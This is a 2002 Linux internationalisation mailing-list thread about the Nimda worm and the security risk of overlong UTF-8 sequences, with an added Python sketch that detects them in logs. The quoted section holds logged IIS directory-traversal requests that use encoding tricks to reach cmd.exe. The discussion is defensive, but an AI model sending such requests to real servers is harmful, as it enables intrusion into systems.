Hi,

I mostly recovered my shock :) Most people pointed out that the real juice on my security page was the second example.

http://www.yudit.org/security/

I am telling you - this was mere luck. We also had a virus attack in the company the previous weeks, and it was a Nimda variant. I am not sure I could have reproduced the problem if my friend used Windows at that time - disinfection needs riched20.dll to be replaced. If I were a Windows guy I would experiment with this (*shrug*).

One more thing: when I added Arabic and ported Yudit to Windows this riched20.dll mysteriously disappeared from my wife's hard disk, and she could not compose any emails. Looking at the web revealed that this is a common problem in Windows - this dll sometimes disappears. What a funny OS Windows is!

Sorry for bothering you with Windows things, I just would like to avoid things like this in Linux.

Also it would be nice to keep the current warm atmosphere in the mailing list - I really like this list. People say that in some other mailing lists you can give even good reasons and people still do not listen. I don't like that because if you try to solve a problem and you see that even good reasons cannot win you feel sad. And for some, if no good reasons can win all that is left is violence. I hate violence. Even not-so-smart people can have good ideas, we need to encourage and embrace them.

Cheers
gaspar

On Fri, 15 Feb 2002, Oyvind A. Holm wrote:

> On 2002-02-14 22:50 Markus Kuhn wrote:
>
> > For those of you still wondering what I was worried about a few years
> > ago with regard to overlong UTF-8 sequences, here some extract from
> > our httpd log files:
> >
> > ...
> > GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
> > GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
> > GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
> > GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
> > GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
> > GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
> > GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
> > GET /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
> > GET /msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
> > GET /msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
> > GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
> > GET /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
> > GET /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
> > ...
> >
> > P.S.: Has anyone an idea, which IIS worm performs the above HTTP
> > vulnerability tests? Is it one of the later Nimda variants or
> > something else?
>
> Think it is one of the earliest Nimda variants. My access_log and
> error_log were flooded with similar false hits. About 190.000 hits like
> that in one day. Think it was around 2001-09-19, after some days it
> decreased quite rapidly. Filled up my log partition first, though.
> Quite annoying. I really wonder how much bandwidth resources those worms
> throw away. Guess when micro$oft gets this .net thing on track with
> their funny protocols things will not actually improve.
>
> Øyvind
>
> +===================================================================+
> | OpenPGP: 0xAD19826C 2000-01-24 Øyvind A. Holm <[EMAIL PROTECTED]> |
> | Fingerprint: EAE5 DCA0 0626 5DAA 72F8 0435 2E2B E476 AD19 826C |
> +=========== 2 + 2 = 5 for extremely large values of 2. ============+
>
> --
> Linux-UTF8: i18n of Linux on all levels
> Archive: http://mail.nl.linux.org/linux-utf8/
>

--
Linux-UTF8: i18n of Linux on all levels
Archive: http://mail.nl.linux.org/linux-utf8/
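
Added example, not part of the original messages: a log-triage sketch in Python that peels percent-encoding layers from request paths like those in the quoted httpd log and reports any overlong UTF-8 sequence with the code point it decodes to. The function names, `max_layers`, and the choice of sample paths (query strings omitted) are assumptions of this example.

```python
import re

# Smallest code point that genuinely needs an n-byte sequence. Lengths 5 and 6
# come from the original UTF-8 definition and show up in the quoted log.
MIN_CP = {2: 0x80, 3: 0x800, 4: 0x10000, 5: 0x200000, 6: 0x4000000}
PCT = re.compile(rb"%([0-9A-Fa-f]{2})")

# Request paths taken from the httpd log extract quoted in the message above.
LOG_PATHS = [
    "/scripts/..%c1%pc../winnt/system32/cmd.exe",
    "/scripts/..%c1%af../winnt/system32/cmd.exe",
    "/scripts/..%e0%80%af../winnt/system32/cmd.exe",
    "/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe",
    "/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe",
    "/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe",
]

def pct_decode_once(data: bytes) -> bytes:
    """Undo one layer of %XX escaping; malformed escapes such as %pc are kept."""
    return PCT.sub(lambda m: bytes([int(m.group(1), 16)]), data)

def overlong_sequences(data: bytes):
    """Return (raw_bytes, code_point) for each overlong UTF-8 sequence in data."""
    found, i = [], 0
    while i < len(data):
        n = 8 - (data[i] ^ 0xFF).bit_length()  # count of leading 1 bits
        tail = data[i + 1:i + n]
        if 2 <= n <= 6 and len(tail) == n - 1 and all(b & 0xC0 == 0x80 for b in tail):
            cp = data[i] & (0x7F >> n)
            for b in tail:
                cp = (cp << 6) | (b & 0x3F)
            if cp < MIN_CP[n]:  # a shorter encoding exists, so this one is overlong
                found.append((data[i:i + n], cp))
            i += n
        else:
            i += 1
    return found

def inspect(path: str, max_layers: int = 4):
    """Peel percent-encoding layers; return (layers, overlong findings, final bytes)."""
    data, layers = path.encode("latin-1"), 0
    while layers < max_layers and (decoded := pct_decode_once(data)) != data:
        data, layers = decoded, layers + 1
    return layers, overlong_sequences(data), data

if __name__ == "__main__":
    for p in LOG_PATHS:
        layers, overlong, final = inspect(p)
        hits = [f"{raw.hex()} -> U+{cp:04X}" for raw, cp in overlong]
        print(f"{layers} layer(s) overlong={hits or '-'} {p}")
```

A strict UTF-8 decoder rejects every sequence this reports; Python's own `bytes.decode("utf-8")` raises on them.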
